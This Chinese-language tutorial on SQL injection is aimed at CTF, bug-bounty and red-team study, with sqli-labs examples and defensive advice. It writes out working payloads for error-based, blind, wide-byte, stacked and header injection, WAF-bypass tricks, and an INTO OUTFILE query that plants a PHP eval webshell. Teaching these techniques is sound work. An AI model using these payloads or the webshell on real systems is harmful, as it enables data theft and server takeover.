SQL注入深度剖析与实战指南（CTF\/SRC进阶版）<\/h1>

一、SQL注入原理<\/h2>
核心概念<\/strong>：SQL注入是一种发生在应用程序与数据库层之间的安全漏洞。
根本原因<\/strong>：当Web应用程序向后台数据库传递SQL语句进行数据库操作时，如果对用户输入的参数没有经过严格的过滤处理<\/strong>，攻击者就可以构造特殊的SQL语句（即“Payload”），并直接输入数据库引擎执行。
本质<\/strong>：服务器未对用户的输入做充分校验，导致用户可控的输入被嵌入到SQL语句中并被服务端执行。
危害<\/strong>：可能导致应用程序信息泄露、数据被篡改、甚至被攻击者写入Webshell，获取服务器控制权。<\/p>

二、SQL注入分类<\/h2>
文章主要介绍了以下几种SQL注入类型：<\/p>

联合查询注入 (Union Query Injection)<\/strong><\/li>
报错注入 (Error-Based Injection)<\/strong><\/li>
布尔盲注 (Boolean-Based Blind Injection)<\/strong><\/li>
时间盲注 (Time-Based Blind Injection)<\/strong><\/li>
宽字节注入 (Wide-Character Injection)<\/strong><\/li>
堆叠注入 (Stacked Queries Injection)<\/strong><\/li>
HTTP头部注入 (HTTP Header Injection)<\/strong><\/li> <\/ol>

三、各类注入技术深度剖析<\/h2>
1. 联合查询注入<\/h3>
原理<\/strong>：利用 UNION<\/code> 或 UNION ALL<\/code> 关键字，将恶意查询的结果合并到原始查询的结果集中，从而在页面上回显数据库信息。<\/p>
UNION<\/code>：合并结果集并去除重复记录。<\/li> UNION ALL<\/code>：合并结果集但不去除重复记录。<\/li> <\/ul> 利用条件<\/strong>：<\/p> 页面存在SQL注入漏洞。<\/li> 页面有回显位<\/strong>，即查询结果会显示在页面上的特定位置。<\/li> <\/ol> 利用步骤（以sqli-labs Less-1为例）<\/strong>：<\/p> 判断注入点与闭合方式<\/strong>：?id=1'<\/code> 产生报错，确定为字符型，单引号闭合。<\/li> 判断字段数<\/strong>：使用 ORDER BY<\/code> 子句。 ?<\/span>id=<\/span>1<\/span>' ORDER BY 3 --+ <\/span><\/span><\/span><\/code><\/pre>当 ORDER BY 4<\/code> 报错，ORDER BY 3<\/code> 正常时，说明当前查询结果为3个字段。<\/li> 寻找回显位<\/strong>：使用 UNION SELECT<\/code>，并使原查询不返回结果（如 id=-1<\/code>），让联合查询的结果显示出来。 ?<\/span>id=-<\/span>1<\/span>' UNION SELECT 1,2,3 --+ <\/span><\/span><\/span><\/code><\/pre>此时页面显示数字 2<\/code> 和 3<\/code>，说明第2和第3个字段是回显位。<\/li> 获取数据<\/strong>：将回显位替换为想要查询的信息。 ?<\/span>id=-<\/span>1<\/span>' UNION SELECT 1, database(), version() --+ <\/span><\/span><\/span><\/code><\/pre>即可在页面上显示当前数据库名和版本。<\/li> <\/ol> 2. 报错注入<\/h3> 原理<\/strong>：利用数据库函数的某些特性，通过故意触发数据库错误，并使错误信息中包含我们想查询的数据。<\/p> 常见报错函数<\/strong>：<\/p> updatexml()<\/strong><\/p> 功能<\/strong>：更新XML文档。<\/li> 报错原理<\/strong>：当第二个参数（XPath路径）格式错误时，会报错，并将错误路径的内容返回。<\/li> Payload<\/strong>： AND<\/span> updatexml(1<\/span>, concat(0<\/span>x7e, (SELECT<\/span> database<\/span>()), 0<\/span>x7e), 1<\/span>) <\/span><\/span><\/code><\/pre>错误信息会显示 ~database_name~<\/code>。<\/li> <\/ul> <\/li> extractvalue()<\/strong><\/p> 功能<\/strong>：从XML文档中提取值。<\/li> 报错原理<\/strong>：与 updatexml<\/code> 类似，XPath路径格式错误时报错。<\/li> Payload<\/strong>： AND<\/span> extractvalue(1<\/span>, concat(0<\/span>x7e, (SELECT<\/span> version<\/span>()), 0<\/span>x7e)) <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> floor()<\/strong><\/p> 报错原理<\/strong>：利用 count()<\/code>、floor()<\/code>、rand()<\/code> 和 group by<\/code> 在特定条件下产生的重复键错误。<\/li> Payload<\/strong>： AND<\/span> (SELECT<\/span> 1<\/span> FROM<\/span> (SELECT<\/span> count<\/span>(*<\/span>), concat((SELECT<\/span> database<\/span>()), 0<\/span>x3a, floor(rand(0<\/span>)*<\/span>2<\/span>)) x FROM<\/span> information_schema.tables GROUP<\/span> BY<\/span> x) a) <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> exp()<\/strong><\/p> 功能<\/strong>：计算e的x次方。<\/li> 报错原理<\/strong>：传入一个超大值（如 ~0<\/code>，即按位取反后的0，是一个极大数）导致计算溢出错误。<\/li> Payload<\/strong>： AND<\/span> exp(~<\/span>(SELECT<\/span> *<\/span> FROM<\/span> (SELECT<\/span> database<\/span>())a)) <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ul> 利用场景<\/strong>：在页面没有正常回显位，但会显示数据库报错信息时使用。<\/p> 3. 时间盲注<\/h3> 原理<\/strong>：当页面不会返回错误信息，无论输入什么，都只回显一种界面（如“页面存在”或“页面不存在”）时，可以根据页面返回的时间延迟<\/strong>来判断注入的SQL语句是否执行成功。<\/p> 常用延迟函数<\/strong>：<\/p> sleep(n)<\/code>：使数据库暂停 n<\/code> 秒。 AND<\/span> IF<\/span>(1<\/span>=<\/span>1<\/span>, sleep(5<\/span>), 0<\/span>) <\/span><\/span><\/code><\/pre><\/li> benchmark(count, expr)<\/code>：重复执行表达式 expr<\/code> 共 count<\/code> 次，通过大量计算制造延迟。 AND<\/span> IF<\/span>(1<\/span>=<\/span>1<\/span>, benchmark(10000000<\/span>, sha1('test'<\/span>)), 0<\/span>) <\/span><\/span><\/code><\/pre><\/li> <\/ul> 利用步骤（以sqli-labs Less-9为例）<\/strong>：<\/p> 判断注入点<\/strong>：?id=1' AND sleep(5)--+<\/code>，页面响应明显延迟，说明存在时间盲注，且为单引号闭合。<\/li> 猜解数据库名长度<\/strong>： ?<\/span>id=<\/span>1<\/span>' AND IF(length(database())=8, sleep(5), 1) --+ <\/span><\/span><\/span><\/code><\/pre>如果延迟5秒，则说明数据库名长度为8。<\/li> 逐字符猜解数据库名<\/strong>：使用 substr()<\/code> 和 ascii()<\/code> 函数。 ?<\/span>id=<\/span>1<\/span>' AND IF(ascii(substr(database(),1,1))=115, sleep(5), 0) --+ <\/span><\/span><\/span><\/code><\/pre>判断数据库名的第一个字符的ASCII码是否为115（即字母 's'）。通过二分法可快速猜出所有字符。<\/li> <\/ol> 后续猜解表名、列名、数据的逻辑类似，只需修改SELECT子查询即可。<\/p> 4. 布尔盲注<\/h3> 原理<\/strong>：页面根据查询条件返回两种状态（如“You are in...”或空白页面）。通过构造逻辑判断（True\/False），根据页面返回的不同状态<\/strong>来推断数据信息。<\/p> 利用步骤（以sqli-labs Less-8为例）<\/strong>：<\/p> 判断注入点<\/strong>：?id=1'<\/code> 页面无内容，?id=1' AND 1=1--+<\/code> 页面正常，?id=1' AND 1=2--+<\/code> 页面无内容，说明是布尔盲注。<\/li> 猜解数据<\/strong>：使用逻辑判断结合字符串函数。猜长度： ?<\/span>id=<\/span>1<\/span>' AND length(database())=8 --+ <\/span><\/span><\/span><\/code><\/pre><\/li> 猜内容（使用 left()<\/code> 或 substr()<\/code> + ascii()<\/code>）： ?<\/span>id=<\/span>1<\/span>' AND left(database(), 1)='<\/span>s' --+ <\/span><\/span><\/span><\/code><\/pre>或 ?<\/span>id=<\/span>1<\/span>' AND ascii(substr(database(),1,1))>100 --+ <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 5. 宽字节注入<\/h3> 原理<\/strong>：利用字符编码转换（如PHP默认UTF-8，数据库为GBK）的特性，绕过 addslashes()<\/code> 或 magic_quotes_gpc<\/code> 等转义函数。<\/p> addslashes()<\/code> 会将单引号 '<\/code> 转义为 \'<\/code>（%5c%27<\/code>）。<\/li> 在GBK编码中，%df%5c<\/code> 是一个整体，代表汉字“運”。如果我们在单引号前加上 %df<\/code>，转义后变成 %df%5c%27<\/code>，数据库会认为 %df%5c<\/code> 是一个汉字，从而使单引号 %27<\/code> 成功逃逸。<\/li> <\/ul> 利用Payload<\/strong>：<\/p> ?<\/span>id=<\/span>1<\/span>%<\/span>df' AND 1=1 --+ <\/span><\/span><\/span><\/code><\/pre>这样，注入点就成功闭合，可以执行后续的联合查询或报错注入。<\/p> 6. 堆叠注入<\/h3> 原理<\/strong>：利用 mysqli_multi_query()<\/code> 等支持执行多条SQL语句的函数，通过分号 ;<\/code> 分隔，一次性执行多条SQL语句。限制<\/strong>：非常依赖后端数据库API是否支持多语句执行。常见的 mysqli_query()<\/code> 通常只执行一条语句。<\/p> 利用示例（sqli-labs Less-38）<\/strong>：<\/p> ?<\/span>id=<\/span>1<\/span>'; INSERT INTO users(id, username, password) VALUES ('<\/span>38<\/span>','<\/span>less38','<\/span>hello') --+ <\/span><\/span><\/span><\/code><\/pre>执行后，即可在数据库中插入一条新记录。<\/p> 7. HTTP头部注入<\/h3> 原理<\/strong>：应用程序会获取并处理客户端HTTP Header中的信息（如 User-Agent<\/code>, Cookie<\/code>, Referer<\/code>, X-Forwarded-For<\/code> 等），如果这些信息未经严格过滤就直接拼接到SQL语句中，就会产生注入漏洞。<\/p> 常见类型与利用<\/strong>：<\/p> Cookie注入 (sqli-labs Less-20)<\/strong>：登录后，修改Cookie值为 Dumb' AND updatexml(1,concat(0x5e,database(),0x5e),1)#<\/code>。<\/li> User-Agent注入 (sqli-labs Less-18)<\/strong>：修改请求头中的User-Agent为 test' AND updatexml(1,concat('~',database(),'~'),1) AND '1'='1<\/code>。注意最后的 AND '1'='1'<\/code> 用于闭合原SQL语句中的引号。<\/li> Referer注入 (sqli-labs Less-19)<\/strong>：修改请求头中的Referer为 test' AND updatexml(1,concat('~',database(),'~'),1) AND '1'='1<\/code>。<\/li> <\/ul> 四、护网\/面试相关要点<\/h2> 1. SQL注入防御措施<\/h3> 预编译（参数化查询）<\/strong>：最有效的方法。将SQL语句与参数分离，用户输入永远被视为参数而非SQL代码。<\/li> 输入过滤与验证<\/strong>：黑名单<\/strong>：对特殊字符（如单引号、括号、斜杠）进行转义或过滤。<\/li> 白名单<\/strong>：对输入内容进行严格的正则表达式匹配（如年龄字段只允许数字）。<\/li> <\/ul> <\/li> 最小权限原则<\/strong>：数据库操作账户应遵循最小权限原则，避免使用root等高权限账户。<\/li> 规范编码<\/strong>：统一使用UTF-8等安全编码，避免宽字节注入。<\/li> <\/ul> 2. 宽字节注入原理<\/h3> 由于PHP文件编码为UTF-8，而数据库连接使用GBK编码。当PHP将请求发送到MySQL时，经过一次GBK编码。攻击者提交 %df'<\/code>，经 addslashes<\/code> 转义为 %df\'<\/code>（%df%5c%27<\/code>）。在GBK编码下，%df%5c<\/code> 被当作一个汉字解析，导致单引号 %27<\/code> 逃逸。<\/p> 3. SQL注入写入Webshell的条件与方法<\/h3> 条件<\/strong>：<\/p> 已知网站的绝对路径。<\/li> 数据库用户具有 FILE<\/code> 权限。<\/li> MySQL配置 secure_file_priv<\/code> 为空或指向可写目录。<\/li> <\/ol> 方法<\/strong>：<\/p> UNION<\/span> SELECT<\/span> 1<\/span>, "<?php @eval($_POST['cmd']);?>"<\/span>, 3<\/span> INTO<\/span> OUTFILE 'C:\/www\/shell.php'<\/span> <\/span><\/span><\/code><\/pre>或利用字段终止符：<\/p> UNION<\/span> SELECT<\/span> 1<\/span>, "<?php @eval($_POST['cmd']);?>"<\/span>, 3<\/span> INTO<\/span> OUTFILE 'C:\/www\/shell.php'<\/span> LINES TERMINATED BY<\/span> ''<\/span> <\/span><\/span><\/code><\/pre> OUTFILE<\/code> 可以写入多行数据。<\/li> DUMPFILE<\/code> 只能写入一行数据。<\/li> <\/ul> 4. SQLMap中Risk和Level的区别<\/h3> Risk (风险等级)<\/strong>：数值越高（1-3），测试的Payload数量越多<\/strong>，包含更高风险的语句（如 INSERT<\/code>, UPDATE<\/code>）。<\/li> Level (探测等级)<\/strong>：数值越高（1-5），测试的范围越广<\/strong>，不仅测试GET\/POST参数，还会测试Cookie、Host、Referer等HTTP头部。<\/li> <\/ul> 5. SQL注入绕过WAF的常见思路<\/h3> 编码绕过<\/strong>：使用十六进制、URL编码、Unicode编码等。<\/li> 大小写变换<\/strong>：UnIoN SeLeCt<\/code>。<\/li> 字符串分割\/拼接<\/strong>：CONCAT('sel','ect')<\/code>。<\/li> 注释符混淆<\/strong>：UN\/**\/ION SEL\/**\/ECT<\/code>。<\/li> 使用等价函数\/语句<\/strong>：用 like<\/code> 代替 =<\/code>，用 mid()<\/code> 代替 substring()<\/code>。<\/li> 盲注绕过<\/strong>：当联合查询和报错注入被拦截时，优先使用时间盲注或布尔盲注。<\/li> 协议层绕过<\/strong>：修改HTTP请求方法、使用畸形请求包等。<\/li> <\/ul> 6. --os-shell<\/code> 的使用条件<\/h3> SQLMap的 --os-shell<\/code> 功能需要满足以下条件：<\/p> 数据库用户为DBA（数据库管理员）权限。<\/li> 数据库用户具有文件读写权限。<\/li> 已知网站的绝对路径。<\/li> Web应用程序语言（如PHP）支持执行系统命令。<\/li> <\/ol> 7. 分析SQL注入告警是否成功<\/h3> 检查状态码<\/strong>：排除302（重定向）、404（未找到）、502（坏网关）等非200状态码。<\/li> 分析请求包<\/strong>：判断请求参数中的SQL语句是否为恶意的注入Payload。<\/li> 分析响应包<\/strong>：判断响应体内是否包含数据库的敏感信息（如数据库名、表结构、数据内容）或系统报错信息。<\/li> <\/ol> 这份教学文档系统地梳理了SQL注入的核心原理、各种攻击技术的手动利用步骤、以及相关的实战和面试要点。掌握这些内容，对于在CTF比赛、SRC漏洞挖掘和护网行动中应对SQL注入类漏洞至关重要。<\/p>